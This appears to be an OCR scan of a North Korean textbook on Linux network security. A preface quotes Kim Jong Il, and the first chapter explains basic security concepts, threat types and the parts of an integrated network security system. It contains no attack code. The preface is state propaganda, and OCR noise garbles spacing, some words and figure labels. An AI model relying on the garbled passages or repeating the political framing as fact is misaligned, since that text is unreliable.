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머 리 말 

위대한 령도자 김정일동지께서는 다음과 같이 지적하시였다. 

《우리는 정보기술，나노기술，생물공학을 발전시키는데 선차적으로 힘을 널어야 하 
며 그중에서도 정보기술 특히 프로그람기술을 빨리 발전시켜야 합니다. 프로그람기술은 투 
자가 적게 들고 우리 사람들이 총명하기때문에 잘하면 짧은 시일에 세계적수준을 돌파할 
수 있습니다.》 

위대한 령도자 김정 일동지께서는 독창적 인 과학기술중시 로선을 제시 하시고 정보기술 
특히 프로그람기술을 빨리 발전시 킬데 대한 강령적 인 가르치심을 주시였다. 

또한 프로그람기술을 발전시키는데서 우리 식의 조작체계를 개발할데 대한 주체적 인 방 
침을 제시하시고 그 실현을 위한 투쟁을 현명하게 이끌어주시였다. 

위대한 령도자 김정일동지의 가르치심을 높이 받들고 우리의 과학자，기술자들은 우 
리식의 조작체계인〈〈붉은별》과 응용프로그람들인 통합사무처리프로그람〈〈우리》，〈〈서 
광》등을 개발하여 인민경제의 콤퓨터화에 적극 이바지하고있다. 

특히 온 나라에 실현된 콤퓨터망이〈〈붉은별》조작체계에 기초하여 운영되는 조건에 맞 
게 여러가지 망운영프로그람들이 개발되여 널리 리용되고있다. 

망의 관리와 운영에서 중요하게 제기되는 문제의 하나는 보안대책을 철저히 세우는것 
이다. 그래야 비공개자료들의 류출과 해커에 의한 자원의 손상을 막고 효률적인 통신을 보 
장할수 있다. 

이 책에서는 망보안체계와 해킹에 대한 일반적인 개념과《붉은별》조작체계가 기초 
하고있는 Linux 체계에서의 보안체계설정을 비롯한 망보안에 대한 문제들을 취급하고있다. 

우리는 망보안에 대한 여러가지 수법들을 깊이 파악하고 활용함으로써 인민경제의 를 
퓨터화에 적 극 이 바지해 나가야 한다. 
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제 1 장. 망보안체계의 개념 

이 장에서는 망보안의 일반적개념과 필요성，일반적인 망통신규약과 망흐름구조，통 
합망보안체계에 대해서 서술한다. 

제1절. 망보안의 필요성 


21세기는 정보산업의 시대이다. 

정보는 우리의 생활의 모든 분야에서 도움을 주지만 때로는 공개되지 않고 보호받아 
야 할 정보들이 류출됨으로써 그로 인한 피해가 심각해지고있다. 

인터네트의 급속한 발전에 따라서 망에 련결된 콤퓨터들이 늘어남에 따라 필요한 정 
보를 신속하게 얻을수 있는 우점이 있는 반면에 이를 리용한 체계침입과 파괴，정보의 류 
출현상이 점점 증대되고있다. 

일반적으로 망에 련결된 콤퓨터에서의 가장 큰 위협은 허용되지 않은 사용자가 호스 
트 ( host ) 에 침 입하여 그의 자원을 손상시키거 나 중요한 정 보를 류출시키며 장애를 조성 하 
여 정 상적 인 사용자의 를퓨터리용에 문제 를 일 으키 도록 만드는것 이 다. 물론 이 려 한 위 협 
요소를 매 개 콤퓨터 가 가지 고있는 자체보안능력 에 의 존하여 대 처할수도 있지 만 많은 호스 
트들이 망에 공존하고있는 경 우에 는 각 체 계마다 동일 한 보안규칙 을 적 용하기 란 쉽 지 않 
다. 

그러면 망보안에서 중요한 기 초개 념 이 라고 말할수 있는 정 보보안에 대 해서 구체 적으 
로 고찰해보자. 

1.1.1. 자료，정보 및 정보보안 

정보는 자료와 구별되는 개념이다. 

자료는 현실 세계에서 관찰이나 즉정을 동하여 수집된 문자나 기호 등으로 표시된 단 
순한 사실이 나 값을 말한다. 

반면에 정보는 이러한 자료를 유용한 형래로 해석 하거나 가공한것을 말한다. 

이것은 주로 콤퓨터체계를 통한 작업으로 가능한 일이며 따라서 정보에는 부가가치의 
개념이 강하게 내포되여있고 이러한 정보의 실제적가치를 보존하기 위하여 정보의 보안을 
요구하고있 다. 

눈부신 콤퓨터 기술의 발전과 정 보통신 기 술이 결 합발전하면서 나타나기 시 작한 정 보 
관련기술은 정보의 생산과 류통을 비 약적으로 증가시켰다. 이리한 정보관련기술의 발전과 
흐름에 의하여 정보의 수집，가공，처 리，분배 등은 정 보산업시대의 기초기술로서 
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요한 자리 를 차지 하고있 다. 

지 난시 기 기 계 제 산업 시 대 에 서 는 어 떤 사회 적 인 사고로 인한 후과가 일정 한 시 간과 지 
역적 범위 에서 사회시 설의 일부만을 파괴 하는 정도로 그쳤으나 정보산업시대 에서 보안상사 
고는 어떤 기관이나 국가，더 나아가서 세계적인 규모에서 악영향을 끼치기때문에 대단히 
심각한 문제로 제기되고있다. 


1.1.2. 정보보안의 목표와 조건 

정보보안은 특정한 정보에 대한 합법적 인 자격을 갖춘 사용자에게는 해당 정보를 정 
확하게 시기적절하게 제공해주며 그렇지 않은 사람 즉 정식 인증되지 않은 사람에게는 부 
당한 접근을 통제하여 해당 정보를 류출하거나 변경，삭제，손상시키지 않도륵 하는것을 주 
요목표로 하고있다. 

이러한 정보보안의 목표를 달성하기 위하여 구체적으로 다음의 3가지 조건을 만족하 
여 야 한다. 


一기밀성 ( Confidentiality ) 

모든 정보는 정식 인증된 사용자에게만 접근이 허용되여야 하며 외부의 어떠한 불법 
사용자에게도 류출되지 않게 하여 야 한다. 

이리한 기밀성을 유지하려면 접근통제수법이 필요한데 이것은 조작체계와 같은 체계 
수준의 접 근통제뿐만아니 라 망준위 에서의 접 근통제 도 포함한다. 

망상에서 이동하는 정보에 대한 기밀성보장을 위해서는 암호화기술이 필요하다. 

一 완전성 ( Integrity ) 

모든 정보는 정식 인증된 사용자의 의도대로 정확하게 보존되여 야 한다. 

완전성을 만족하기 위하여서는 허가되지 않은 정보변경이 발생하면 안된다. 

또한 정 보체 계 에 접 근하는 대 상에 대 한 물리 적，제 도적，기 술적통제 가 필요하다. 

만일 완전성 이 위 반된 경우가 발생하면 이것을 빠른 시 간에 발견하여 원상복구하는 기 
술체계도 필요하다. 

일 반적 으로 일 반통신망을 통하여 정 보의 교환이 이 루어질 경 우 악의 를 가전 사람에 의 
하여 정보의 변조가 이루어질수 있다. 이것은 정보의 외곡뿐아니라 정보체계의 믿음성에 관 
한 문제 이 기때문에 반드시 지켜 야 한다. 


— 리 용성 ( availability ) 

모든 정보는 정식 인증된 사용자가 이것을 요구할 때 즉시 제공되여야 한다. 

해커 에 의한 정 보체 계의 파괴뿐아니 라 정 보체 계의 고장과 같은 운영 상의 실수도 리용 
성를 떨구는 요소로 된다. 따라서 이리한 리용성을 만족하기 위하여서는 정보의 중복성유 
지나 여벌복사작업이 필수적이며 정보체계에 대한 보다 철저한 정기검사도 필요하다. 

는 그 자체가 부단한 통신과정을 통하여 끊임없이 교류되여야 그 의의가 있다. 


接 
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이 리한 정보통신구조의 가장 중요한 자리를 차지하는것은 콤퓨터망이다. 

따라서 콤퓨터 망보안은 정보산업시 대의 중추를 이루는 기 본전제조건이며 필수적 인 핵 
심기술로서 부각되고있다. 

1.1.3. 망의 위협요소와 취 약성 

일반적으로 망에서 정보의 흐름은 원천지주소에서 목적지주소로 이어지게 되는데 이 
러한 정보의 흐름이 방해를 받거나 변경될 경우 보안상 문제를 발생시킨다. 이와 같은 망 
의 위협요소에는 다음과 같은것들이 있다. 

一 방해 (Interruption) 

체계의 일부가 파괴되거나 사용불가능하게 만드는 경우로서 체계가 가지고있는 리용 
성 을 공격 하는 형 래 이 다. 례 를 들면 를퓨터 의 하드디 스크를 파괴 하거 나 망을 절 단하거 나 파 
일체계를 파괴하는 등의 공격이 여기에 해당된다. 


一 가로채 기 (Interception) 

허가되지 않은 사용자가 전송중에 있는 해당한 정보를 가로채여 정보의 기밀성 
(Confidentiality) 을 침해 하는것 이 다. 일반적으로 망도청 이 여기 에 해 당된다. 

一 수정 (Modification) 

허가되지 않은 사용자가 체계에 불법적으로 접근하여 자료를 변경함으로써 자료의 완 
전성 을 침 해 하는것 이 다. 즉 자료의 값변경，프로그람의 변조，망상에 서 전송중인 통보를 수 
정 하는 등의 행 위 가 여 기 에 해 당된 다. 

一 위조 (Fabrication) 

허 가되지 않은 사용자가 체계 에 거 짓정 보를 삽입 하여 체 계의 인증성 (Authenticity) 
을 침해하는 행위 이 다. 즉 망상에서 위조된 정보를 삽입하거 나 파일에 레코드를 삽입하는 
등의 행위가 여기에 해당된다. 

이 와는 별도로 망위 협 요소를 공격류형 에 따라 분류하면 다음과 같이 고찰할수 있 다. 

— 의 도적 인 위 협 (Intentional Threats) 

이것은 고의적 으로 망보안을 침해 하여 정보획득이 나 변조，파괴를 시도하는 경우로서 이 
러 한 행 위 자를 침 입 자 (intruder) ， 파괴 자 (cracker) ， 혹은 해 커 (hacker) 라고 부론다. 

이 러 한 의 도적 인 위 협 은 정 보체 계 의 상태 에 예 상치 않은 영 향을 주게 되 는 적 극적 인 위 
협과 그렇지 않은 소극적 인 위협으로 나눌수 있다. 

O 적극적인 위협 

전송중인 망자료흐름의 수정，거짓자료의 삽입，침입자신분위장，재전송 및 봉사거부 
등의 직접적인 방법으로 체계를 공격하는 행위가 해당된다. 

이 것은 득정대상의 지정 유무에 따라 구분할수 있는데 대 상을 지정 하는 경우 
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적인 해킹수법을 통하여 특정체계의 정보를 삭제하거나 변조하는 경우，불필요한 봉사요 
구를 집중발생시킴으로써 정상적인 봉사를 방해 ( DoS:Denial of Service ) 하는 경우 등이 속 
한다. 

대상을 지정하지 않는 경우에는 콤퓨터비루스나 인터네트웜 ( worm ), 트로이목마와 같 
은 악성코드 (malicious code ) 가 대표적인 실례이다. 

O 소극적인 위협 

전송중인 망자료흐름을 도청하거 나 감시 하는 공격 류형 이다. 즉 침 입 자가 망상에 서 자 
료흐름내 용을 가로채 는 방법 과 전송량，전송회 수，자료의 길 이 등을 분석하여 자료흐름의 
성격을 추출하는 행위가 해당된다. 

대 표적 인 경 우는 산업정 탐을 통한 정 보류출을 생 각할수 있 다. 

이러한 의도적인 위협은 침입자를 릉가하는 기술적인 대처가 최선의 방책으로 된다. 

정보보안관련기술의 대부분은 바로 의도적 인 위협을 예 방하거 나 발견，처 리하는데 목 
적을 두고있다. 


— 사고에 의 한 위협 (Accidental Threats ) 

정 보체 계 를 구축하는 하드웨 어 나 쏘프트웨어 에 장애 나 사고가 발생하여 정 보보안조건 
인 완전성 과 리용성 이 만족되 지 못하는 경 우를 말한다. 

사고에 의한 위협 에는 지 진，홍수，화재 와 같은 자연적 인 위협도 포함된다. 

사고에 의 한 위협은 설비장애 (Failures of Equipment ) 의 경우가 많지만 하드웨어 보 
수오유나 쏘프트웨 어유지 보수오유와 같이 운영 자의 실수에 의한 인적오유 (Errors by 
People ) 도 주요원인으로 되고있다. 운영 자에 대 한 기술교육，철저한 정기검사，세심한 관 
리 및 사고에 대처한 적절한 조치 가 있다면 사고에 의한 위협은 상당히 감소될수 있다. 


一 정보체계의 취약성 

위 협 ( threat ) 요소가 해 당 정 보체 계 의 보안을 침 해 할수 있는 요소들을 가리 킨다면 취 
약성 ( vulnerability ) 은 해 당 정 보체 계 가 다양한 위 협 요소들가운데 서 일 부 위 협 요소들에 약 
점 으로 로출되 여있는것 을 말한다. 

례를 들어 주위에 수많은 위협요소가 있음에도 불구하고 어떤 정보체계가 정보보안에 
취약점을 거의 가지고있지 않다면 이것은 정보보안측면에서 매우 합당한 체계로 평가될수 
있 다. 

이처럼 현재의 콤퓨터환경에서 매개 호스트들의 자체보안에 가장 큰 방해로 되는것은 
콤퓨터환경 의 다양성 과 복잡성 으로 인 한것 이 다. 즉 다양한 콤퓨터체 계 들이 각기 다른 조 
작체제에서 동작되며 각 체계가 가지고있는 보안상의 문제점도 서로 다르기때문에 매개 호 
정한 수준이상의 보안성 을 적용시 키 기에는 많은 노력과 어 려움이 따르게 된다. 
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1.1.4. 콤퓨터의 자체보안 

일 반적 으로 대 부분의 콤퓨터 보안모형 은 호스트보안에 관련된것 이 다. 이 리 한 보안모형 
을 기초로 매개 호스트에 대한 보안능력을 향상시킬수 있으며 호스트에 영향을 미치는 각 
종 보안위협요소들을 막을수 있다. 현재 콤퓨터환경 에서 호스트들의 자체 보안에 가장 큰 방 
해로 되는것은 콤퓨터환경 의 다양성과 복잡성 이 다. 콤퓨터개발업체 에서 생산되는 콤퓨터 
체계들은 서로 다른 조작체계에서 동작하며 보안상의 문제점도 제품마다 전혀 다르다. 또 
한 동일한 체계일지라도 사용하는 조작체계나 내부체계의 구성，응용쏘프트웨어，제공되 
는 봉사에 따라 내포된 보안상의 문제점들이 달라질수 있기때문에 호스트의 보안성을 유 
지 하는데 많은 노력 이 든다. 

따라서 호스트 자체보안모형은 보안의 요구사항이 명확하거 나 규모가 작은 망에 더 적 
합하다. 망보안모형 은 이 미 망안에 서 의 호스트들에 대 한 자체보안모형 을 포함하고있 는것 
이 보통이며 특히 방화벽호스트와 같이 외부에 로출되는 호스트인 경우에는 매우 높은 준 
위 의 자체 보안능력 을 가지 고있 어 야 한다. 이 리 한 호스트를 보통 장벽 ( Bastion ) 호스트라 
고 부론다. 

호스트의 자체 보안은 체 계 에 대 한 전문적 인 지 식 을 가지 고 득별 한 접 근권 한이 부여 된 
사용자에 의해 적 용되 여 야 하는데 이 렇게 체 계관리 자를 설정하면 체 계의 수가 많아질수록 
특권을 가전 사용자의 수도 자연히 많아지 기 때 문에 매 개 호스트에 대 해 모두 자체보안모 
형을 적용시키기는 어렵다. 또한 호스트를 안전하게 보호하는것이 호스트를 망에 련결하 
는것보다 어 려 운 일 이며 내부망에 련결된 호스트들가운데서 보안상 안전하지 않은 특정한 
호스트가 침 입당했을 경우 전체 망에 막대한 피 해를 줄수도 있는것 이 다. 따라서 내부망전 
체에 일관되게 적용시킬수 있는 보안방법이 필요하다. 

보안기술들을 잘 활용하면 지금까지 출현한 공격수법들에 능히 대응할수 있다. 그럼 
에도 불구하고 보안침해사건이 계속 발생하고있는것은 옳바른 보안체계가 서 있지 않고 보 
안제품들이 분산되여 관리운영이 잘 되지 않기때문이다. 

현재 보안제품들은 통합화되는 추세를 보이고있으며 단순한 보안제품의 개발이 아니 
라 통합적 인 보안체 계 의 개 발로 발전하고있 다. 또한 보안체 계관리 를 통합적 이 며 유일 적으 
로 진행 하고있으며 임의의 공격 에 효과적 이 고 즉시 적 인 대 응을 하기 위해 종합적 인 감시 
기록체계를 세우고있다. 


錢變邊 錢變變©繼鹽 


1 } 





Lirnix 당보안 


제2절. 망보안체계의 구성 

1.2.1. 망보안체계의 개념 

보안은 망보안，업무보안，자료보안 등을 포괄하는 폭넓은 범주이다. 

망보안체계 란 망을 통해 전달되는 정보들을 보호하고 망을 통한 정보의 류출을 막으 
며 망의 효률적인 통신을 보장하기 위한 체계를 말한다. 

망보안체계는 망을 구성하고 업무활동에 참가하는 모든 대상들과 그것들사이의 통신 
에 대한 보안을 실현한다는데서 다른 보안체계와 구별된다. 



믐용쏘프트리||]ᅥ 사큼자 


그림 1-1. 보안대상들 

망보안체계의 보안대상에는 망，체계，응용쏘프트웨어，사용자들이 속한다. 

매 대상에 대한 보안요구는 다음과 같다. 

1) 망보안 

망보안은 국부망으로부터 광지역망，무선망 등에 이르기까지 모든 망들의 보안을 포 
괄한다. 

망보안에서 우선 중요한것은 어느 망이 보호되여있지 않는가를 인식하는것 이다. 

또한 정 확한 망관리구조를 가지 는것 이 중요하다. 다시 말하여 IP 주소와 이 름공간의 효 
과적 인 관리 이다. 

망보안에서 또한 중요한것은 보안으로부터 오는 성능저하를 없애는것이다. 

따라서 보안방책 에 대 역 폭관리 와 같은 봉사질 ( QoS : Quality of Service ) 관리 방책 을 통합 
하는것이 중요하다. 
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2) 체계보안 

보다 안전한 망보안을 실현하기 위해서는 집단내의 모든 체계들을 보안하여야 한다. 

이것은 봉사기，말단콤퓨터，원격의 뢰기 등 망에 접 근할수 있는 모든 장치 들의 보안 
을 포함한다. 

공격 으로부터 체계를 보호할뿐만아니 라 체계와 망사이통신도 보호하여 야 한다. 

내 부봉사기 들을 외 부의 공격 으로부터 보호하자면 봉사기 에 서 방화벽 과 같은것 을 실 행 
하여 야 한다. 뿐만아니 라 말단콤퓨터 들도 개 인용방화벽 을 설 치하여 야 하며 중앙에 서 관리 
되는 보안방책을 받아야 한다. 

체 계 공격 중에 서 가장 심 한것 이 봉사거 부 ( DoS : Denial of Services ) 공격 이 다. 

체계보안은 이 봉사거부공격을 막는 대책이 있어야 한다. 

3) 응용쏘프트웨어보안 

망에서 는 수많은 응용쏘프트웨어 들이 봉사를 진행 하고있다. 

응용쏘프트웨어 들을 인식하여 합법 적 인 망봉사가 도용되 지 않고있 다는것 을 담보하여 
야 한다. 례를 들어 HTTP ( TCP 포구 80) 가 실제는 트로이목마에 의해 도용되는가를 알 
아낼수 있어 야 한다. 

전통적인 파케트려과는 이러한 단순한 공격에도 취약하며 망보안을 담보하지 못한다. 
오직 응용쏘프트웨 어 를 인식 하는 상태 검 열 (Stateful Inspection ) 과 같은 기 술만이 자료흐 
틈의 완전성을 담보할수 있다. 

4) 사용자보안 

보안방책에는 사용자에 기초한 접근조종이 있어야 하며 사용자로 인증되기 전에는 망 
에 접근하지 못하게 하는 기구가 필요하다. 

스마트카드，1회 용암호，수자증명 서，통표 ( token ) 의 리 용 등 강한 인증방법 을 리용 
하여 야 한다. 

1.2.2. 망보 안체 계 의 구성 요소 (Component) 

망보안체 계 는 보안방책 을 실제 적 으로 집 행하는 보안구성 요소 (Security Component ) 
들과 관리 를 진행 하는 관리 구성 요소 (Management Component ) 들로 이 루어 진다. 

여 기서 는 구성요소들의 모둘구성 과 각 부분체 계의 기능들이 구성 요소들에 의해 어떻 
게 실 현되 는가를 구체 적 으로 보여준다. 

1) 보안구성요소 

보안구성 요소들은 보안방책을 집 행 하는데 참가하는구성요소로서 다음과같은것들이 있다. 
u 보안관문 (Security Gateway ) 

^ 보안봉사기 (Security Server ) 
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亡〒 인증봉사기 (Auth Server ) 
u 내 용려과봉사기 (Content Filter Server ) 

亡〒 비 루스려 과봉사기 (Virus Filter Server ) 

^ 인증국봉사기 (Certificate Authority Server ) 

1 균 침 입 검 출봉사기 (Instrusion Detection Server ) 

^ 보안의 뢰 기 (Security Client ) 

^ 보 안방책 봉사기 (Policy Server ) 

이것들외에 보안기능이 추가되는데 따르는 보안구성요소들을 새로 만들수도 있다. 모 
든 보안구성 요소들은 보안틀에 따라 보안관문을 중심 으로 조립되 게 된 다. 

매 보안구성요소들에 대한 구체적 인 내용은 다음과 같다. 

一 보안관문 

보안관문은 경 계 선보안 (perimeter security ) 을 포함한 통합적 보안을 실 현 하는 망보안 
의 가장 중요한 구성요소이며 망보안체계의 기둥이라고 말할수 있다.(그림 1-2 를 참고할 
것) 


m 

련 1 

VPNfFW 관문 

관리모둘 (HI 몬今 




핵심부 

VPN/FW 모둘 

QoS 모둘 
부하분산모둘 





그림 1-2. 보안관문의 모듈구성 


보안관문의 기본모둘은 방화벽과 VPN 모둘 이며 핵심부준위에서 구현되여야 한다. 
각 모둘 별 기능을 표 1-1 에 보여주었 다. 
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표 1-1. 

모듈들의 기능 

모 듈 

기 능 

방화벽모둘 (핵심부준위) 

방화벽모둘은 접 근조종체 계 의 기 능을 수행한다. 

VPN 모둘 (핵심부준위) 

VPN 체 계 의 기 능을 수행한다 . 

QoS 모둘 (핵심부준위) 

대 역폭관리체 계의 기능을 수행한다. 

부하분산모둘 (핵심부준위) 

부하분산체 계 의 기 능을 수행한다. 

무리 체 계 모둘 

중복체 계 의 기 능을 수행한다. 

관리데몬모둘 (응용준위) 

보안관문에 보안방책 을 설정하며 기 록을 전송하는 등 
의 관리 를 위한 모둘이 다. 


一 보안봉사기 

보안봉사기는 방화벽을 통한 접속의 인증 및 내용려과를 진행하는 구성요소이다. 이 
것은 보안관문에 설치되며 방화벽의 사용자인증 및 자원에 기초한 접근조종은 이 봉사기 
에 의해 진행 된 다.(그림 1-3) 


보만§』나:? I 


r - 1 

i t 


< i 

\ 민증 s 둘 | 

< 1 

I [ 

< 1 

내용보만모둘 


다른 봉사기 
와외 둘신모둘 


그림 1-3. 보안봉사기의 모듈구성(점선은 모듈이 없들수도 있다는것을 표시한다.) 

보안봉사기는 응용봉사기 에로의 2차접속을 개설하는 투명한 대 리자로서 동작한다. 그 
리하여 보안봉사기 는 현존 접 속의 인증 및 내 용보안을 위해 다른 인증봉사기 및 내 용려 과 
봉사기 에로 접속하여 처 리를 의뢰할수 있다. (그림 1-4) 

—인증봉사기 

인증봉사기는 추가적 인 구성요소로서 보안관문이 외부에 인증을 의뢰할 때 리 용된다. 
인증방식 에 는 여 러 가지 가 있으며 요구에 따라 선택하여 쓸수 있 다. 

례 를 들어 1회 용암호에 의한 인증방식 을 리용할수도 있 다. 
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一 내용려과봉사기 

내용려과봉사기는 추가적인 구성요소로서 보안관문이 외부에 내용려과를 의뢰할 때 리 
용된다. 

FTP 의 지령이나 ， SMTP 의 우편주소 ， HTTP 의 URL 을 려과하는 보안방책을 집행 할 때 
리용된 다. 


一 비루스봉사기 

비루스봉사기는 추가적 인 구성요소로서 보안관문이 외부에 비루스려과를 의뢰 할 때 리 
용된다. 



그림 1-4. 보안봉사기와 인증 및 내용려과봉사기와의 련동 



一 인증국봉사기 ( CA 봉사기 ) 

증명서를 발급하고 관리하는 봉사기로서 추가적인 구성요소이다. VPN 봉사기 (보안관 
문)는 CA 증명서를 찾아 등록하며 CRL 목록을 완중기억하는 기능을 가져야 한다. 

一 침입검출봉사기 

침 입 검 출봉사기 는 침 입 검 출체 계 를 위 한 추가적 인 구성 요소로서 보안관문과 련동하여 외 


부로부터의 침입을 차단할수도 있다. 

一 보안의뢰기 

보안의뢰기는 VPN 및 말단보안체 계의 기능을 수행 하기 위한 필수적 인 구성요소이 
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보안의 뢰 기 의 가동환경 은 다양하다. ( 《 붉은별》， Windows 2 x , Windows 9 x , Linux 등) 
따라서 모든 가동환경 에 해 당한 보안의뢰기를 따로따로 개 발하여 야 한다. 

一 보안방책봉사기 

보안방책봉사기 는 말단보안체 계 의 기 능을 수행 하기 위한 추가적구성 요소로서 중앙관 
리봉사기 로부터 사용자 혹은 그롭별 말단보안방책 을 받아 보안의 뢰기 들에 내 려보낸다. 


寒용끓위 


보안의到：? I 


제계 및 비루 
스3 A ᅡ모들 


年아■적 xw 

봉 aF " 기 균 I 
둘신 모들 


關심 부 
空우 ■ 


VPN/FW 모 — 


그림 1-5. 보안의릐기의 모듈구성 


2) 관리구성 요소 

관리 구성 요소는 망보안체 계 를 관리 하는데 참가하는 구성 요소로서 다음과 같은것 들이 있 다. 

^ 중앙관리 봉사기 (Central Management Server ) 

^ 기 륵봉사기 (Log Server ) 
u 상태 감시 기 (Status Viewer ) 

^ 보안방책편집 기 (Policy Editor ) 

^ 기 록열 람기 (Log Viewer ) 

여 보고봉사기 (Report Server ) 

^ 실 시 간망통과량감시 기 (Real Time Traffic Monitor ) 

亡〒 보고열 람기 (Report Client ) 

이 것 들외 에 보안관리기 능이 추가되 는데 따르는 관리구성 요소들을 새 로 만들수도 있 다. 
매 관리 구성요소들에 대한 구체적 인 기능은 다음과 같다. 


—중앙관리봉사기 

중앙관리봉사기는 중앙관리체계의 중심 으로 되는 가장 중요하며 필수적 인 구성요소이 
다. (즉 보안관문은 보안집 행 중심 이 며 중앙관리 봉사기 는 보안관리 중심 이 다. ) 

중앙관리봉사기 는 모든 보안구성 요소들과 보안대상들에 대 한 자료기 지 를 유지 하며 접 
근조종에 서 QoS 조종，부하평 형 조종，기 록통합방책 에 이 르기 까지 의 통일적 인 보안방계 을 확 
립한다.(그림 1-6) 


:ᄇ# 을 확 
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중앙관리 봉사기 는 또한 보안구성 요소들사이 안전한 통신을 위한 CA 로 동작하며 
체 계를 위한 CA 로도 동작할수 있다. 



VPN 


그림 1-6. 중앙관리봉사기 


一 기록봉사기 

기 록봉사기 는 감시기 록체 계 를 위한 필수적 인 구성 요소로서 단순한 기 록만을 보관관리 
하는 봉사기 이 다. 

중앙관리봉사기는 기록봉사기들을 정의하고 모든 기록들을 거기에 보관하도록 한다. 
一 상래 감시 기 

상태감시기 는 감시기 록체 계의 필수적 인 구성 요소로서 모든 보안구성 요소들에 대 한 상 
태 를 실 시 간적 으로 감시한다. 

一 보안방책편집기 

보안방책 편집 기 는 중앙관리 봉사기 의 기 본편집 말단으로서 GUI 환경 에 서 접 근조종방책， 
주소변환방책， VPN 방책， QoS 방책，부하평 형방책，기 록통합방책 등 모든 방책 을 편집하 
며 보안구성요소들과 보안대상들의 정의를 진행한다. 

보안방책 편집기는 중앙관리체계의 필수적 인 구성요소이 다. 

—기록열람기 

기 륵열 람기 는 감시 기 륵체 계 의 필 수적 인 구성 요소로서 사건，일 반기 륵，통계 ， Active 
접속자료들을 볼수 있게 한다. 


—보고봉사기 

보고봉사기 는 감시기 록 및 보고체 계 를 위 한 추가적 인 구성 요소로서 기 록통합방책 에 따 
라 기 록봉사기 로부터 보고자료를 생 성하는데 필 요한 자료를 검 색하여 보관관리하는 봉사 
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보고 ■ M 71 
보고뽑사•모들 


보고자■료기지 관리 모들 


기류등합엔진 


기론봉 A ᅡ기라의 등신모둘 


그림 1-7. 보고봉사기의 모듈 구성 

그림 1-8 에 보고자료의 관리에 대하여 보여주었다. 

一 실시간망통과량감시기 

실 시 간망통과량감시 기 는 대 역 폭관리 체 계 를 위 한 추가적 인 구성 요소로서 망통과량을 감 
시하고 그것을 여러가지 직관적인 표현형식으로 보여준다. 

一 보고열람기 

보고열 람기 는 감시 기 록 및 보고체 계 를 위한 추가적 인 구성 요소로서 보고봉사기 로부터 
각종 보고자료를 여러가지 직관적 인 표현형식으로 보여준다. 

아래 에 기 록통합방책편집 기 와 보고봉사기，보고열 람기 의 보고자료작성 과정 을 보여 주 
었 다. 





그림 1-8. 보고자료의 관리 
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제3절. 통합망보안체계 

우에서 언급한 망보안구성 요소들을 능동적 으로 통합하여 하나의 독자적 인 보안체 계 를 
구성하는것은 콤퓨터망보안에서 매우 중요한 문제로 나선다. 

1.3.1. 설계방향 

첫째로 통합적인 보안체계로 설계하여야 한다. 

다시 말하여 모든 망보안구성 요소들을 통합하고 통일적 인 보안방책 을 확립 한다는것 을 
말한다. 

지금까지 개발된 선진망보안기술들 즉 상태려과，내용려과，비루스제거，가상사설망 
( VPN ) , 침입검출차단，주소변환，봉사질 ( QoS ), 무리 체계 ( Clustering ), 개인용방화벽 기 
술 등을 통합하여 구현하고 일 괄적 이고 종합적 인 보안방책 을 세 우도록 한다. 

둘째로 통합관리체계를 세워야 한다. 

단일 한 관리중심 을 통하여 망보안구성 요소들을 종합적 으로 관리 한다는것 을 말한다. 
유일한 관리자를 통하여 모든 구성요소들에 일괄적 인 보안방책을 세우고 그것들로부 
터의 모든 기록 및 감시 자료들을 종합하여 관리하는 체계를 세운다. 

셋째로 망보안체계를 임의로 축소，확장할수 있는 기틀 ( Framework ) 을 세운다. 

새로운 망보안기술을 신속히 통합하고 보안수준요구정도에 따라 체계를 축소，확장할 
수 있도륵 설계 한다는것을 말한다. 

체계의 모둘화를 강화하며 모둘들사이 통신규약을 명백히 규정 하여 체계를 축소 및 확 
장시킬수 있는 기 틀을 구성한다. 

넷째로 사용 및 관리의 편리성을 최대로하여 설계한다. 

보안체계의 복잡성은 곧 보안취 약점으로 된다. 그것은 대부분 보안침해사고가 관리를 
잘못한 결과이기때문이며 관리를 잘 하지 못하는것은 보안체계가 복잡하게 구성되여있기 
때 문이 다. 

따라서 관리 를 편 리하게 하도록 설 계하여 야 한다. 

다섯째 로 높은 성 능을 보장하며 만가동할수 있도륵 설 계하여 야 한다. 

이 를 위 해 부하분산화 (Load balancing ) ，무리 체 계 화 ( Clustering ) 를 실 현하여 야 한다. 

여섯째 로 자체 의 암호화통신규약을 설계하여 야 한다. 

{I 
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1.3.2. 망보안체계의 총적구성설계 
1) 망보안의 총적구성체계 

통합적 인 망보안체계의 총적구성도를 그림 1-9 에 보여주었다. 


HE ! 구삼£소 ■ 


S o a o □ 
선 ra r» 며 

^ Ki 7 \m 내 s 려꽈 ca 당사기 침업空 ■ 민 g 물 ju 거 
mm ■나가 «사기 


WBb __ 

빼 _ S 

FTP i-n 

skm S 




7 im ，+ 

압반기 E 

yEH „ 
^XDI S 


보안 방 a 
醫 g 기 




s 망 g 保 ■ 
SliJI 


» Xf ；1 

mm 


占요% 4 s k 


VPN/S E ? 민 31 기 


그림 1-9. 망보안체계의 총적구성도 


설계의 기본사상은 모든 보안구성요소들을 하나의 기틀 ( Framework ) 에 맞추어 통합 
적 으로 구성하는것 이 다. 

망보안체계는 크게 보안관문들로 구성되 여있으며 이것을 중심 으로 하여 다른 모든 보 
안구성 요소들이 통합되 여있 다. 

그림 에서 보는바와 같이 보안관문은 VPN 과 방화벽통합모둘로 구성 되 여있으며 주변 
의 내용려과봉사기，침 입검출봉사기，인증봉사기，감시기록봉사기， CA 봉사기들이 의뢰기 
/봉사기 방식 에 의해 약속된 통신규약으로 서 로 련결되 여있 다. 

또한 중앙관리 봉사기 에 서 는 망보안체 계 의 모든 보안대 상들과 보안구성 요소들에 대 한 종 
합적 관리를 진행 하며 체계에 통일적인 보안방책을 세우고 모든 보안관문들에 배포하도록 되 
여있 다. 

이 구성 체 계 에서 가장 중요한 요소가 보안관문과 중앙관리봉사기 이 며 이 두 요소가 바 
로 망보안체계의 통합적구성과 관리를 실현하게 한다. 

2) 부분체계구성 

망보안체계는 다음과 같은 부분체계들로 구성되 여있다. (그림 1-10) 
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향 중앙관리 체 계 (Central Management System ) 

^ 방화벽에 의한 접근조종체계 (Firewall System ) 

^ VPN 체 계 ( VPN System ) 

亡〒 감시 기 록 및 보고체 계 (Audit Log & Report System ) 

^ 침입검출 및 보호체계 (IDS & IDP System ) 

여 말단보호체 계 (Desktop PC Security System ) 

^ 중복체 계 (Redundant System ) 

亡〒 대 역 폭관리 및 부하분산체 계 (QoS & Load Balancing System ) 



그림 1-10. 망보안체계의 부분제계구성 

모든 부분체계들은 독자적인 체계가 아니며 중앙관리체계에 의해 그 기능과 구성이 통 
합되 여 있 다. 

一 중앙관리체계 

